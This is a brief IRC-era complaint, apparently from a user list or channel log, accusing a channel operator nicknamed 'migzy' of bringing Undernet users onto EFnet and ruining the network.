migzy: channel operator who actively brought undernet infestors onto efnet. thank you for ruining
what is left of a decent IRC >:D<
*******************************************************************************************************